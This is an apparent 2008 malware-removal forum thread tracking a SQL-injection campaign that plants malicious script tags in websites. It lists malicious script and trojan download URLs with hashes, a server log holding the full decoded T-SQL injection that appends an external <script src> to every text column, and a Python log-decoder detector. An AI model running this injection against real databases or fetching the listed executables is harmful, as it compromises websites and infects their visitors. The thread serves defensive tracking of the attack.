Author Topic: SQL Injected jscript sites


July 17, 2008, 09:22:50 pm
Reply #75

YanceySlide


July 19, 2008, 05:53:55 pm
Reply #76

JohnC


July 21, 2008, 02:16:47 am
Reply #77

pcaccent


July 21, 2008, 04:54:54 pm
Reply #78

Orac

Code:
<script src="http://1.verynx.cn/w.js"></script>
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

July 21, 2008, 05:11:36 pm
Reply #79

sowhat-x

Quote
hxxp://www.jvke.ru/ngg.js
hxxp://www.ecx2.ru/ngg.js
Pointing to:
hxxp://nudk.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.jex5.ru/ngg.js
Pointing to:
hxxp://gb53.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.5kc3.ru/ngg.js
hxxp://www.4cnw.ru/ngg.js
hxxp://www.keje.ru/ngg.js
hxxp://www.d5sg.ru/ngg.js
hxxp://www.90mc.ru/ngg.js
Pointing to:
hxxp://4cnw.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.btoperc.ru/ngg.js
hxxp://www.grtsel.ru/ngg.js
Pointing to:
hxxp://h23f.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.o1o2qq.cn/ri.js

July 22, 2008, 01:10:32 pm
Reply #80

sowhat-x

Quote
hxxp://www.keec.ru/ngg.js
Pointing to:
hxxp://keje.ru/cgi-bin/index.cgi?ad

Quote
hxxp://www.9jsr.ru/ngg.js
Pointing to:
hxxp://5kc3.ru/cgi-bin/index.cgi?ad


July 22, 2008, 03:10:52 pm
Reply #81

JohnC


July 24, 2008, 02:43:17 pm
Reply #82

pcaccent


July 24, 2008, 03:35:02 pm
Reply #83

Orac

Code:
<script src="http://abc.verynx.cn/w.js">
<script src="http://1.verynx.cn/w.js">
<script src="http://xunlei.verynx.cn/w.js">


July 26, 2008, 05:45:28 pm
Reply #84

JohnC


August 06, 2008, 06:56:36 pm
Reply #85

sowhat-x


"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
Quote
hxxp://www.plgou.com/csrss/rondll32.exe
And also...
Quote
hxxp://91.203.93.4/cgi-bin/index.cgi?ad

August 06, 2008, 11:06:15 pm
Reply #86

Serg

===
"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
===

fukc... what is it? I've never seen that. Chinese baidu.com, .ru sites and rootkits + unreachable admin page on 246.114.180.29:7854....
pls add this admin page
Code:
http://www.plgou.com/csrss/ack.html
and trojans from that
Code:
http://www.plgou.com/comine/sss.exe
http://www.plgou.com/comine/beauty.exe
http://www.plgou.com/comine/sl.exe
http://www.plgou.com/comine/server.exe

August 06, 2008, 11:34:12 pm
Reply #87

sowhat-x

Regarding the dropped rondll32.exe above...
http://s3cwatch.wordpress.com/2008/08/06/

Didn't really bother digging more into the dropped exes to be honest,
spent more time trying to dig newer "injection" domains per se...

Edit: Thought I should add the hashes from the rest of the .exes as well...
Quote
846790691B6F9717B9A1BF68E0BCD6E5 -> sss.exe
C1D6F2020EA16FA73CF70F522A7ECFD6 -> beauty.exe
82686A1AB42882AE0E40B863E79E6E33 -> sl.exe
526FEEE3909E18DB7D8AA567019B7C2C -> server.exe

August 07, 2008, 11:11:54 am
Reply #88

Orac

One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code:
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(... AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

Decoded, IP address obfuscated for privacy.
Code:
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

The link is returning a 500 Internal server error.

In all we have seen this same SQL injection attempt from 35 individual IPs today.
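A log-side detector for the request shape shown in that post, written here as an added example (not Orac's code or any tool from the thread): it pulls the hex blob out of the CAST(...) stage of each log line, decodes it (plain bytes for CHAR, UTF-16LE for the NCHAR variant of the same attack), and lists the script URLs the payload would append to every text column. The sample log lines and the placeholder domain js.example.invalid are constructed, not taken from the thread.

```python
import re
from urllib.parse import unquote
# Stage 1 of the injection in the log above: SET @S=CAST(0x... AS CHAR(4000)).
CAST_RE = re.compile(
    r"SET\s+@S\s*=\s*CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?CHAR\s*\(\s*\d+\s*\)", re.I)
# The <script src=...> tag the decoded payload appends to every text column.
SRC_RE = re.compile(r"<script\s+src\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)

def decode_hex_payload(hex_str: str) -> str:
    """CHAR() payloads are ASCII; NCHAR() ones are UTF-16LE (NUL every other byte)."""
    raw = bytes.fromhex(hex_str[: len(hex_str) & ~1])  # drop a dangling nibble
    if raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def scan_log_line(line: str):
    """(decoded payload, injected URLs) for an injected request, else None."""
    m = CAST_RE.search(unquote(line))  # the query string is URL-encoded in logs
    if not m:
        return None
    payload = decode_hex_payload(m.group(1))
    return payload, sorted(set(SRC_RE.findall(payload)))

def scan_log(lines):
    """One finding per injected request: source IP, URLs, cursor-walk marker."""
    findings = []
    for line in lines:
        hit = scan_log_line(line)
        if hit:
            findings.append({"ip": line.split(" ", 1)[0], "urls": hit[1],
                             "cursor": "Table_Cursor" in hit[0]})
    return findings
# Constructed sample (not from the post): same shape as the decoded payload above, placeholder domain.
SAMPLE_PAYLOAD = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+"
    "''\"></title><script src=\"http://js.example.invalid/w.js\"></script><!--''')"
    " FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor")
def injected_request(hex_blob: str, kind: str) -> str:
    return ('203.0.113.7 - - [06/Aug/2008:18:43:56 +0000] "GET /forum/viewtopic.php'
            '?t=14727%27;DECLARE%20@S%20' + kind + '(4000);SET%20@S=CAST(0x' + hex_blob
            + '%20AS%20' + kind + '(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0"')
SAMPLE_LINES = [
    injected_request(SAMPLE_PAYLOAD.encode("ascii").hex().upper(), "CHAR"),
    injected_request(SAMPLE_PAYLOAD.encode("utf-16-le").hex().upper(), "NCHAR"),
    '198.51.100.9 - - [06/Aug/2008:18:44:01 +0000] "GET /forum/viewtopic.php?t=14727 HTTP/1.1" 200 8120 "-" "Mozilla/4.0"',
]
```

Running `scan_log(SAMPLE_LINES)` flags the two injected requests with the placeholder URL and leaves the ordinary viewtopic request alone; the same function works on a real access log read line by line.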

August 07, 2008, 02:18:45 pm
Reply #89

pcaccent

Also downloaded.

Quote
hxxp://www.plgou.com/comine/new2.exe
hxxp://www.plgou.com/comine/b.exe